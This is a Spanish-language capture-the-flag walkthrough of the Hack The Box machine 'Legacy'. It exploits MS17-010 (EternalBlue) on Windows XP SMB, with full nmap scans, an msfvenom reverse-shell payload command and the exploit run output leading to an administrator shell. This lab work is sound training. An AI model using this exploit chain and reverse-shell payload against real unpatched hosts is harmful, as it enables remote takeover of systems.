Información de la máquina.
Contenido | Descripción |
---|---|
OS: | |
Dificultad: | Facil |
Puntos: | 20 |
Lanzamiento: | 15/Marzo/2017 |
IP: | 10.10.10.4 |
Primera sangre de usuario: | 0x1Nj3cT0R |
Primera sangre de system: | 0x1Nj3cT0R |
Enumeación.
Como siempre comenzaremos con un escaneo a los 65535
puertos para descubrir cuales son los puertos abiertos.
1
2
3
4
5
6
7
8
9
10
11
intrusionz3r0@kali:~$ nmap -p- --open -T5 -n -oG nmapScanAllPorts legacy.htb -Pn --min-rate 3000
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:13 CDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.23s latency).
Not shown: 65532 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 47.65 seconds
Después lanzaré scripts de enumeración básicos para conocer los servicios y versiones de los puertos abiertos.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
intrusionz3r0@kali:~$ nmap -sCV -p139,445 -oN targeted legacy.htb -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:16 CDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h30m21s, deviation: 2h07m16s, median: 4d23h00m21s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:91:0b (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-09-01T03:17:15+03:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.69 seconds
El escaneo determino lo siguiente:
- Puerto 139/tcp con servicio samba.
- Puerto 445/tcp con servicio samba.
Análisis del servicio samba.
Rápidamente lanzo otro escaneo con nmap con el objetivo de poder encontrar si estas versiones de samba esta asociadas con alguna vulnerabilidad critica.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
intrusionz3r0@kali:~$ nmap -p139,445 --script="Vuln and Safe" legacy.htb -oN vulnScan -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:26 CDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.29s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 18.94 seconds
¡¡Eureka!!
Podemos observar que la máquina es vulnerable a ms17-010
el famoso eternalblue
.
Para explotarlo necesitamos descargarnos el siguiente repositorio: https://github.com/helviojunior/MS17-010
Explotación de eternalblue.
Una vez descargado verificamos si la máquina es vulnerable nuevamente.
1
2
3
4
5
6
7
8
9
10
11
intrusionz3r0@kali:~$ sudo python checker.py legacy.htb [28/28]
Trying to connect to legacy.htb:445
Target OS: Windows 5.1
The target is not patched
=== Testing named pipes ===
spoolss: Ok (32 bit)
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: Ok (32 bit)
Si en la respuesta te arroja cualquier pipe en OK
significa de que es vulnerable.
Creamos una payload.
1
2
3
4
5
6
7
intrusionz3r0@kali:~$ sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=1234 -f exe -o eternal.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: eternal.exe
Por último dejamos nuestro netcat a la escucha y lanzamos el exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
intrusionz3r0@kali:~$ sudo python send_and_execute.py 10.10.10.4 eternal.exe 445 spoolss
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x82129010
SESSION: 0xe21045d8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe21676b0
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe2167750
overwriting token UserAndGroups
Sending file V9TKR5.exe...
Opening SVCManager on 10.10.10.4.....
Creating service BYjN.....
Starting service BYjN.....
The NETBIOS connection with the remote host timed out.
Removing service BYjN.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
Ejecución del binario whoami.exe
¡¡Eureka!!
Tenemos shell pero al intentar ejecutar el comando whoami
podemos observar que es imposible debido a que no exite el binario.
1
2
3
4
C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
Aunque se que somos Administradores de todas formas vamos a intentar ejecutar el binario whoami
en la máquina.
Rápidamente me levanto un servidor con samba compartiendo el whoami.exe
y lo ejecutamos desde ahí.
¡¡Somos Administrador!!
Espero te haya gustado, recuerda seguirme en mis redes sociales para estar al pendiente de todo mi contenido.
¡Muchas Gracias!